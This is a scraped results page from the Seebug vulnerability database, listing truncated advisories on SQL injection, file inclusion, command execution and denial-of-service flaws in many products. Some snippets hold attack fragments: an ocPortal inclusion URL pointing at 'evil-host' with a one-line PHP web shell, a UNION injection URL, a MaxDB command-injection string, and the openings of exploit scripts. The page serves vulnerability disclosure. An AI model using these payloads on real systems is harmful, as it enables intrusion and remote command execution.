Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2007/06/26 12:0 a.m.82 views

Calendarix SQL注入漏洞

Calendarix是一款基于PHP的WEB应用程序。 Calendarix不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。 问题是由于'index.php'脚本对用户提交的'month'和'year'参数缺少过滤,提交恶意SQL查询作为参数数据,可导致应用程序处理时更改原来的SQL逻辑,攻击者可以获得敏感信息或者操作数据库。 Calendarix 0.7.20070307 目前没有解决方案提供: http://www.calendarix.com/ http://www.example.com/calendar.php?month=' UNION...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/10 12:0 a.m.82 views

新云 3.0.0.518 SQL注入

新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。 先看const.asp的GetUserTodayInfo过程。 QUOTE: Lastlogin = Request.Cookies"newaspnet""LastTime" UserDayInfo = Request.Cookies"newaspnet""UserToday" If DateDiff"d",LastLogin,Now0 Then ……………… UserDayInfo = "0,0,0,0,0,0" Response.Cookies"newaspnet""UserToday"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/11 12:0 a.m.82 views

Cisco IOS FTP Server非授权访问及拒绝服务漏洞

Cisco IOS是Cisco网络设备所使用的操作系统。 Cisco IOS所带的FTP Server处理访问请求时存在漏洞,远程攻击者可能利用此漏洞非授权访问系统文件或导致拒绝服务。 启用了IOS FTP Server功能的Cisco IOS没有正确检查用户授权,可能允许攻击者非授权读写设备文件系统中的任意文件,包括设备保存的配置,其中可能有口令或其他敏感信息;此外这种配置的Cisco IOS还可能导致在通过FTP传输文件时IOS重载。 Cisco IOS 12.4 Cisco IOS 12.3 Cisco IOS 12.2 Cisco IOS 12.1 Cisco IOS 12.0...

7AI score
Exploits0
seebug.org
seebug.org
added 2007/05/11 12:0 a.m.82 views

WordPress多个插件远程文件包含漏洞

WordPress是一款免费的论坛Blog系统,wp-Table和wordTube都是其中常用的插件。 WordPress的wp-Table和wordTube插件实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。 wordTube插件中wordtube-button.php文件没有正确验证wpPATH参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意命令。漏洞代码如下: ----------------wordtube-button.php------------------- ... / // get and set path of functio...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/09 12:0 a.m.82 views

phparticle v2.11本地包含漏洞

phparticle一直是一个很好的文章系统,我从前都是拿phparticle的代码来学习php,而且它的代码也一直以安全著称,尽管发现的是个很普通的漏洞,但能有幸发现pa漏洞还是很开心的。 首先看phparticle的index.php代码 errorreporting7; require "global.php"; if!$GET'mod' $GET'mod' = 'index'; if!include "modules/default/$GETmod.php" echo "error:data/modules/default/$GETmod.php";exit; ?...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/07/17 12:0 a.m.82 views

perForms Mambo Component <= 1.0 Remote File Inclusion

No description provided by source. ------------------------------------------------------------------------ --- perForms = 1.0 mosConfigabsolutepath Remote File Inclusion ------------------------------------------------------------------------ --- Remote : Yes Critical Level : High Vuln founded i...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2004/10/13 12:0 a.m.82 views

ocPortal 1.0.3 Remote File Inclusion

No description provided by source. http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. ?php $com = $GET"com"; system "$com"; ? Example of funcs.php if your host support php. ?php echo...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2018/06/08 12:0 a.m.81 views

XNU kernel heap overflow due to bad bounds checking in MPTCP(CVE-2018-4241)

mptcpusrconnectx is the handler for the connectx syscall for the APMULTIPATH socket family. The logic of this function fails to correctly handle source and destination sockaddrs which aren't AFINET or AFINET6: // verify salen for AFINET: if dst-safamily == AFINET && dst-salen !=...

8.1AI score0.08224EPSS
Exploits3
seebug.org
seebug.org
added 2017/09/13 12:0 a.m.81 views

GNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability(CVE-2017-2885)

Summary An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability...

9.9AI score0.24337EPSS
Exploits4
seebug.org
seebug.org
added 2017/02/24 12:0 a.m.81 views

MS16-104: Internet Explorer URL files Security Feature Bypass (CVE-2016-3353)

On September 13th, 2016 Microsoft released security bulletin MS16-104 1, which addresses several vulnerabilities affecting Internet Explorer. One of those vulnerabilities is CVE-2016-3353, a security feature bypass bug in the way .URL files are handled. This security issue does not allow for remo...

5.1CVSS8.7AI score0.11774EPSS
Exploits1
seebug.org
seebug.org
added 2017/01/19 12:0 a.m.81 views

zzcms user/logincheck.php SQL injection vulnerability

inc/function.php 72 line php function getip if getenv"HTTPCLIENTIP" && strcasecmpgetenv"HTTPCLIENTIP", "unknown" $ip = getenv"HTTPCLIENTIP"; else if getenv"HTTPXFORWARDEDFOR" && strcasecmpgetenv"HTTPXFORWARDEDFOR", "unknown" $ip = getenv"HTTPXFORWARDEDFOR"; else if getenv"REMOTEADDR" &&...

7.3AI score
Exploits0
seebug.org
seebug.org
added 2016/08/01 12:0 a.m.81 views

PhpMyAdmin 4.3.0—4.6.2 authorized users remote command execution vulnerability

Problem source code part in PMA 4.6.2: - libraries/controllers/table/TableSearchController.php:708: php 708: private function getRegexReplaceRows ... 727: if isarray$result 728: foreach $result as $index=$row 729: $result$index1 = pregreplace 730: "/" . $find . "/", 731: $replaceWith, 732: $row0...

7.5CVSS9.3AI score0.81373EPSS
Exploits8
seebug.org
seebug.org
added 2016/06/16 12:0 a.m.81 views

Struts2 remote code execution vulnerability S2-037)

Source link: http://drops.wooyun.org/papers/16875?utmsource=tuicool&utmmedium=referral 0x01 vulnerability review According to the official description Obviously there are two key points: the first is the REST Plugin,the other is Dynamic Method Invocation is enabled. That opens the dynamic method...

7.5CVSS9.8AI score0.17171EPSS
Exploits2
seebug.org
seebug.org
added 2016/05/10 12:0 a.m.81 views

WordPress 4.2.0-4.5.1 flashmediaelement.swf 反射型 XSS 漏洞

漏洞概述 WordPress 于 2016 年 5 月 6 号发布新版本 4.5.2,其中修了一 个反射型 XSS 漏洞,直接影响 4.2.0 至 4.5.1 版本。该反射型 XSS 源 于 WordPress 一个处理媒体的插件 MediaElement,攻击者能够构 造恶意 Payload,使之解析媒体文件时触发 XSS 下面的分析部分来源:https://midzer0.github.io/2016/wordpress-4.5.1-xss/ Source Code Preparation 一般来说, 开源CMS所使用的Flash文件也都来自其他的开源项目,...

6.5AI score
Exploits0
seebug.org
seebug.org
added 2016/02/14 12:0 a.m.81 views

西门子S7-300存在权限绕过漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/24 12:0 a.m.81 views

aspcms最新版逻辑错误导致后台地址泄露

简要描述: 后台管理目录对于不少的web系统来说非常重要,一旦后台地址泄露,很可能造成致命的打击。 详细说明: aspcms的自带插件都存在泄露后台地址的漏洞。 例如下图所示/plug/oem/AspCmsOEMFun.asp文件: 直接浏览器访问: http://.../plug/oem/AspCmsOEM.asp 即可弹出错误提示,然后重定向用户到真正的后台地址。。。 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/06/01 12:0 a.m.81 views

一采通电子采购系统多处SQL注入漏洞

简要描述: 一采通电子采购系统多处SQL注入漏洞 详细说明: google:inurl:companycglist.aspx?ComId= 1 漏洞存在于 /Orders/k3orderdetail.aspx,参数FINTERID 例如 http://eps.umgg.com.cn/Orders/k3orderdetail.aspx?FINTERID=1 2 漏洞存在于 /organization/GetUserList2.aspx,参数UserName 例如...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/05/22 12:0 a.m.81 views

eyou某服务器OPENSSL漏洞(影响大量网站邮箱系统)

简要描述: 详细说明: 118.194.236.38 Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 770 ... received message: type = 22, ver = 0302, length = 203 ... received message: type = 22...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/04/14 12:0 a.m.81 views

PHPCMS V9 /phpsso_server/phpcms/modules/phpsso/index.php SQL注入漏洞

/api/getmenu.phpfunction ajaxgetlist $cachefile = $GET'cachefile'; $cachefile = strreplacearray'/', '//', '', $cachefile; //$cachefile = pregreplace'/\x00-\x08\x0B\x0C\x0E-\x1F\x7F+/S', '', $cachefile; $path = $GET'path'; $path = strreplacearray'/', '//', '', $path; //$path =...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/12/30 12:0 a.m.81 views

某通用型大学生管理系统非授权访问

简要描述: 1操作手册泄漏测试用户及密码 2非授权访问,可直接获取系统内所有用户关键信息 3一枚任意文件上传漏洞 详细说明: 注意与其不同 WooYun: 某通用型创新管理系统普通帐号可越权查看及修改任意用户(影响多所高等院校) 官网:http://www.changedu.com/ 由南京先极科技有限公司开发的大学生创新创业训练项目智能管理系统 关键字:大学生创新创业项目智能管理系统 影响案例: http://desktop.nju.edu.cn/cx/ 南京大学大学生创新创业训练智能管理系统 http://dxscx.forestpolice.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.81 views

pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit

No description provided by source. ?php $list = array '/phpmyadmin/', '/phpMyAdmin/', '/PMA/', '/pma/', '/admin/', '/dbadmin/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/php-my-admin/', '/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/',...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.81 views

HolaCMS 1.2.x/1.4.x Voting Module Directory Traversal Remote File Corruption Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/12799/info HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server. This issue is similar to the vulnerability described in BID 12789 HolaCMS Voting Module Remote File Corruption...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.81 views

MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability

No description provided by source. ============================================================================================== MyAlbum = 3.02 langsdir Remote File Inclusion Vulnerability =============================================================================================== Critical...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.81 views

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability

No description provided by source. N/X - Web CMS N/X WCMS 4.5 Multiple Vulnerability =================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/04/16 12:0 a.m.81 views

Kerio Control OpenSSL TLS心跳信息泄漏漏洞

CVE ID:CVE-2014-0160 Kerio Control是一款防火墙系统。 Kerio Control所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Kerio Control 8.x Kerio Control 8.2.2 patch2已经修复该漏洞,建议用户下载使用: http://www.kerio.com...

5CVSS0.6AI score0.99999EPSS
Exploits87
seebug.org
seebug.org
added 2013/12/17 12:0 a.m.81 views

Linux Kernel本地权限提升漏洞

Bugtraq ID:64291 CVE ID:CVE-2013-6368 Linux Kernel是一款开源的操作系统。 如果用户空间提供的vapicaddr地址在页面的末尾,KVM kvmlapicsyncfromvapic和kvmlapicsynctovapic在处理跨页边界的虚拟APIC存取时存在内存破坏漏洞,非特权本地用户可利用该缺陷使系统崩溃或提升权限。 0 Linux Kernel 厂商补丁: redhat ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

6.2CVSS0.00613EPSS
Exploits2
seebug.org
seebug.org
added 2013/12/02 12:0 a.m.81 views

Nginx Blank Null Byte 代码执行漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/06/11 12:0 a.m.81 views

Linux Kernel 'b43'无线驱动本地特权提升漏洞

CVE ID:CVE-2013-2852 Linux是一款开源的操作系统。 Linux b43无线驱动存在安全问题,允许本地攻击者利用漏洞提升权限。 b43无线驱动drivers/net/wireless/b43/main.c b43requestfirmware函数可使用"fwpostfix"模块参数来更改文件名用于获取固件,如果此文件没有找到的情况下,错误消息会把文件名以格式串处理,这可导致应用程序崩溃或可以从uid-0提权到ring-0。 0 Linux Kernel 3.9.4 厂商解决方案 用户可参考如下厂商提供的安全公告获得补丁信息:...

6.9CVSS0.01022EPSS
Exploits1
seebug.org
seebug.org
added 2012/10/10 12:0 a.m.81 views

Python哈希冲突拒绝服务漏洞(CVE-2012-1150)

CVE ID: CVE-2012-1150 Python是一种面向对象、直译式计算机程序设计语言。 Python 2.6.8之前版本、2.7.x、3.x、3.2.x版本计算哈希值时没有预先限制哈希冲突,可允许攻击者通过向包含哈希表的应用发送特制的应用支持拒绝服务。 0 python 2.6.8 厂商补丁: Python ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: www.python.org...

5CVSS0.9AI score0.0506EPSS
Exploits3
seebug.org
seebug.org
added 2012/09/18 12:0 a.m.81 views

SPDY protocol &lt;=3 协议信息泄露漏洞

CVE ID:CVE-2012-4930 SPDY是Google开发的基于传输控制协议TCP的应用层协议。 Mozilla Firefox, Google Chrome及其他多个产品使用的SPDY协议3,执行压缩数据加密时没有正确模糊未加密数据的长度,可通过中间人攻击的攻击者可通过提交一系列猜测请求,观察到压缩数据长度的变化也称CRIME攻击来获得明文HTTP头信息,造成敏感信息泄露如cookie信息。 0 SPDY protocol 3及之前版本 厂商解决方案 用户可参考如下供应商获得最新版本的产品: http://www.google.com/chrome...

2.6CVSS9.2AI score0.02079EPSS
Exploits1
seebug.org
seebug.org
added 2012/05/09 12:0 a.m.81 views

Microsoft Windows TCP/IP本地权限提升漏洞(MS12-032)

BUGTRAQ ID: 53349 CVE ID: CVE-2012-0179 Microsoft Windows是流行的计算机操作系统。 Microsoft Windows在实现上存在影响TCP/IP栈组件'tcpip.sys'的本地权限提升漏洞,攻击者可利用此漏洞通过在另一个进程中执行任意代码获取提升的权限,可能会造成拒绝服务。 0 Microsoft Server 2008 Windows Server 2008 R2 x64 SP1 Microsoft Server 2008 Windows Server 2008 R2 x64 0 Microsoft Server 2008...

7.2CVSS6.4AI score0.01606EPSS
Exploits1
seebug.org
seebug.org
added 2011/12/24 12:0 a.m.81 views

IBM Lotus Domino RPC操作拒绝服务漏洞

Bugtraq ID: 51167 CVE ID:CVE-2011-1393 IBM Lotus Domino服务器是一款基于WEB合作的应用程序架构。 IBM Lotus Domino处理某些RPC操作存在错误,可被利用进行拒绝服务攻击。 远程攻击者可以提交特制的Notes客户端报文使Lotus Domino服务器崩溃。 0 IBM Lotus Domino 8.5.2 IBM Lotus Domino 8.5 IBM Lotus Domino 8.0.2 Fix Pack 5 IBM Lotus Domino 8.0.2 IBM Lotus Domino 8.5.2 FP3 IBM...

7.8CVSS6.5AI score0.02014EPSS
Exploits1
seebug.org
seebug.org
added 2011/12/24 12:0 a.m.81 views

Linux kernel 2.6.x 'SG_IO IOCTL' SCSI请求本地特权提升漏洞

Bugtraq ID: 51176 CVE ID:CVE-2011-4127 Linux是一款开放源代码的操作系统。 Paolo Bonzini发现主机linux系统允许在分区或LVM卷上执行SGIO ioctl,并允许向底层块设备传递命令。这可进一步在虚拟化上下文利用,因为virtio磁盘通过SGIO ioctl支持有限的SCSI直通。如果分区上或LVM卷上的virtio磁盘设置为format=raw,类似sgdd的工具可用于读和写相同磁盘上的其他数据,即便这些数据属于宿主机或其他guest。 0 Linux kernel 2.6.x 厂商解决方案...

4.6CVSS0.00566EPSS
Exploits2
seebug.org
seebug.org
added 2011/10/05 12:0 a.m.81 views

JBoss addURL Misconfiguration Attack

No description provided by source. !/usr/bin/perl Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner Date: Oct 3 2011 Author: y0ug at codsec.com Version: Tested on: Linux CVE : CVE-2010-0738 POC against misconfigured JBoss JMX Console It use the addUrl method in DeploymentScanner...

5CVSS5.8AI score0.79415EPSS
Exploits28
seebug.org
seebug.org
added 2011/06/27 12:0 a.m.81 views

Apple Mac OS X 10.6.8之前版本存在多个安全漏洞

Bugtraq ID: 48412 CVE ID:CVE-2011-0196 CVE-2011-0197 CVE-2011-0198 CVE-2011-0199 CVE-2011-0200 CVE-2011-0201 CVE-2011-0202 CVE-2011-0203 CVE-2011-0204 CVE-2011-0205 CVE-2011-0206 CVE-2011-0207 CVE-2011-0208 CVE-2011-0209 CVE-2011-0210 CVE-2011-0211 CVE-2011-0212 CVE-2011-0213 CVE-2011-1132 Apple...

7.8CVSS8.3AI score0.03903EPSS
Exploits3
seebug.org
seebug.org
added 2011/03/03 12:0 a.m.81 views

vsftpd FTP Server &quot;ls.c&quot;远程拒绝服务漏洞

BUGTRAQ ID: 46617 CVE ID: CVE-2011-0762 vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。 Vsftpd 2.3.2 Vsftpd 2.3 厂商补丁: Vsftpd ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://vsftpd.beasts.org/ include stdio.h include stdlib.h include...

4CVSS0.7332EPSS
Exploits9
seebug.org
seebug.org
added 2010/06/21 12:0 a.m.81 views

IBM WebSphere应用服务器default_create.log信息泄露漏洞

BUGTRAQ ID: 40694 CVE ID: CVE-2010-2323 IBM Websphere应用服务器以Java和Servlet引擎为基础,支持多种HTTP服务,可帮助用户完成从开发、发布到维护交互式的动态网站的所有工作。 在目标系统上使用zPMT和BBOWWPFx任务模板创建配置文件的时候,可能会向defaultcreate.log日志中写入敏感信息。 IBM Websphere Application Server 7.0.x 厂商补丁: IBM --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

5CVSS6.5AI score0.01043EPSS
Exploits1
seebug.org
seebug.org
added 2009/11/30 12:0 a.m.81 views

PHP proc_open()绕过safe_mode_protected_env_var限制漏洞

BUGTRAQ ID: 37138 CVE ID: CVE-2009-4018 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP没有执行任何检查便允许传送对procopen所指定的环境变量,这就忽略了safemodeallowedenvvars和safemodeprotectedenvvars设置。用户可以绕过safemode限制访问Apache UID可访问的任意文件。 PHP 5.3.x 厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.5CVSS6.3AI score0.11341EPSS
Exploits5
seebug.org
seebug.org
added 2009/05/23 12:0 a.m.81 views

ZaoCMS (user_updated.php) Remote Change Password Exploit

No description provided by source. form action="http://demo.zaocms.com/admin/modules/Users/userupdated.php" method="post" onsubmit="return checkFormthis;" id=form1 Name=form1 h2Cod3 By ThE g0bL!N ZaoCMS Remote Change Password /h2 tittle ThE g0bL!N/tittle table cellSpacing="0" cellPadding="0"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/03/19 12:0 a.m.81 views

OpenCart order参数SQL注入漏洞

BUGTRAQ ID: 34121 OpenCart是基于PHP的开源在线购物车系统。 OpenCart没有正确地过滤用户所提交的order URL参数,未经认证的攻击者可以通过向服务器提交特制的SQL查询请求访问数据库中的任意数据,包括用户名、MD5口令哈希、支付网关凭据等。 OpenCart 1.1.8 厂商补丁: OpenCart -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.opencart.com/...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/09/01 12:0 a.m.81 views

VMware OpenProcess本地特权提升漏洞

BUGTRAQ ID:30936 CVE ID:CVE-2008-3698 CNCVE ID:CNCVE-20083698 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 VMware OpenProces存在特权提升问题,本地攻击者可以利用漏洞在宿主系统上执行任意代码。 目前没有详细漏洞细节提供。 VMWare Workstation 5.5.8 build 108000 VMWare Workstation 5.5.8 VMWare Server 1.0.7 build 108231 VMWare Server 1.0.7...

7.2CVSS6.7AI score0.00457EPSS
Exploits1
seebug.org
seebug.org
added 2008/08/27 12:0 a.m.81 views

Simple PHP Blog (SPHPBlog) &lt;= 0.5.1 Code Execution Exploit

No description provided by source. ? / sIMPLE php bLOG 0.5.0 eXPLOIT bY mAXzA 2008 / function curl$url,$postvar global $cook; $ch = curlinit $url ; curlsetopt $ch, CURLOPTRETURNTRANSFER, 1; curlsetopt $ch, CURLOPTHEADER, 1; curlsetopt $ch, CURLOPTREFERER,"$url"; if strlen$postvar3 $postvar="123";...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/05/31 12:0 a.m.81 views

Mambo Component mambads &lt;= 1.0 RC1 Beta SQL Injection Vulnerability

No description provided by source. !/usr/bin/perl -w Mambo Component mambads 1.0 RC1 Beta & 1.0 RC1 Remote SQL Injection Found by : Houssamix From H-T Team H-T Team HouSSaMix + ToXiC350 from MoroCCo Greetz : Stack & CoNaN & HaCkeREgY & room-hacker & Hak3r-b0y & All friends & All muslims HaCkeRs :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/01/11 12:0 a.m.81 views

SAP MaxDB cons.exe远程命令注入漏洞

BUGTRAQ ID: 27206 MaxDB是SAP应用中广泛使用的数据库管理系统。 MaxDB在处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。 如果未经认证的远程攻击者执行了show或execsdbinfo等特殊命令的话,MaxDB服务器就会通过system执行cons.exe DATABASE COMMAND,而使用system执行cons程序允许外部攻击者通过传送&&或其他方式在服务器上执行任意命令。例如,可使用以下SAP命令查看Windows上C盘的内容: execsdbinfo && echo dir c:\ | cmd.exe SAP...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/01/08 12:0 a.m.81 views

TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability

No description provided by source. AUTHOR : H-T TeaM HouSSaMix ToXiC350 HOME : http://no-hack.net Script : TUTOS Tested in version 1.3 other versions may also be affected. Download : http://www.tutos.org/homepage/index.html BUG : Command Execution Vulnerability...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/08/15 12:0 a.m.81 views

WengoPhone SIP Soft Phone畸形报文拒绝服务漏洞

WengoPhone SIP Soft Phone是一款基于SIP的VoIP电话程序。 WengoPhone SIP Soft Phone实现存在消息验证检查问题,远程攻击者可以利用漏洞进行拒绝服务攻击,使应用程序崩溃。 问题是存在于SIP客户端组件不正确处理SIP报文,MESSAGE处理没有"Content-Type"字段的畸形报文可导致应用程序崩溃。 Wengo WengoPhone 2.1 目前没有解决方案提供: http://www.wengophone.com/ /main.cpp/ include stdio.h include string using namespace...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/29 12:0 a.m.81 views

MyDNS远程动态DNS升级拒绝服务漏洞

MyDNS是运行在UNIX系统上的免费DNS服务程序。 MyDNS的src/mydns/update.c文件中updategobblerr函数存在堆溢出漏洞,远程攻击者可能利用此漏洞导致DNS拒绝服务。 如果远程攻击者向有漏洞的服务器提交了恶意查询请求的话,就可能触发这个溢出,导致拒绝服务。成功攻击要求用户拥有升级权限,且在mydns.conf文件中allow-update设置成为yes。 Don Moore MyDNS 1.1.0 临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: 将allow-update设置为no。 厂商补丁: Don...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/29 12:0 a.m.81 views

Gimp SUNRAS插件set_color_table()缓冲区溢出漏洞

GIMP是GNU Image Manipulation Program(GNU图像处理程序)的缩写,是一款跨平台的图像处理软件。 GIMP的SUNRAS插件处理还有畸形数据的RAS文件时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。 SUNRAS插件中setcolortable函数中存在栈溢出漏洞,plug-ins/common/sunras.c文件中漏洞代码如下: int ncols, j; guchar ColorMap2563; ncols = sunhdr-lrasmaplength / 3; if ncols = 0 return; for j = 0; j...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/27 12:0 a.m.81 views

EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability

No description provided by source. ------------------------------------------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script: EsForum 3.0 Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html Contact: ilker Kandemir...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/03/29 12:0 a.m.81 views

iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability

No description provided by source. iPhotoAlbum v1.1header.phpRemote File Include Vulnerability D.Script: http://sourceforge.net/projects/iphotoalbum/ Discovered by: GloDM = Mahmoodali Homepage: http://www.Tryag.cc V.Code Exploit:Path/lib/static/header.php?setmenu=SheLL Greetz To: Tryag-Team &...

7.1AI score
Exploits0
Total number of security vulnerabilities5000